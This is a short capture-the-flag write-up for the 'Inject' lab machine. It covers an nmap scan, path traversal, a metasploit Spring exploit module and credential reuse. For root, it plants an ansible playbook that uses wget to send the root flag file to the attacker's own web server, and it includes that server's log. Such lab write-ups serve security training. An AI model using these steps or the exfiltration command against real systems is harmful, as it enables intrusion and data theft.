Inject

• Date completed: 2023-03-13
• Difficulty: Easy
• OS: Linux

User flag

Initial nmap:

$ nmap -sC -sV 10.10.11.204
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 16:19 CDT
Nmap scan report for 10.10.11.204
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.19 seconds

If we look at the website on port 8080, we'll see that it has an upload function. After uploading a file, it's possible to view it.

Replacing the path of the file with ../../../../../../../etc/passwd works, indicating that this machine is vulnerable to local file inclusion.

After poking around for quite a while, I eventually found that this machine has a pom.xml file, which shows that it's running Maven with Spring Framework 3.2.3. This version is vulnerable and has a metasploit module available.

Running the metasploit module exploit/multi/http/spring_cloud_function_spel_injection against the machine results in a shell as the user frank.

Inside of the home directory for frank, there's a hidden file which contains the password for phil.

Log in as phil using su, then cat the user flag!

Root flag

Running pspy shows that this machine is running all of the ansible playbooks under /opt/automation/tasks about every 2 minutes. frank is unable to write there, but phil can.

Create a new playbook in the same directory and add a shell command to cat the root flag:

$ cat > playbook_2.yml << EOF
- hosts: localhost
  tasks:
  - name: Getting the flag
    command: bash -c 'wget "http://10.10.16.11:8000/$(cat /root/root.txt)"'
EOF

Then start a web server on port 8000 and wait:

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.204 - - [13/Mar/2023 20:50:04] code 404, message File not found
10.10.11.204 - - [13/Mar/2023 20:50:04] "GET /<flag> HTTP/1.1" 404 -